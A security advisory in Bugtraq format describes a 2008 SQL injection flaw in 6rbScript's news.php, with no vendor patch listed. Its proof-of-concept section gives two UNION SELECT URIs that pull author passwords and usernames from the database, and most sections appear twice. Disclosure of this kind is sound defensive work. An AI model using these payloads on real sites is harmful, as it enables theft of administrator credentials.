6rbScript 'news.php' SQL Injection Vulnerability
BID:29331
Info
6rbScript 'news.php' SQL Injection Vulnerability
| Bugtraq ID: | 29331 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 21 2008 12:00AM |
| Updated: | May 22 2008 07:24PM |
| Credit: | Hussin X |
| Vulnerable: |
6rbScript 6rbScript 0 |
| Not Vulnerable: | |
Discussion
6rbScript 'news.php' SQL Injection Vulnerability
6rbScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6rbScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
6rbScript 'news.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
password:
http://www.example.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--
user:
http://www.example.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
password:
http://www.example.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--
user:
http://www.example.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--
Solution / Fix
6rbScript 'news.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].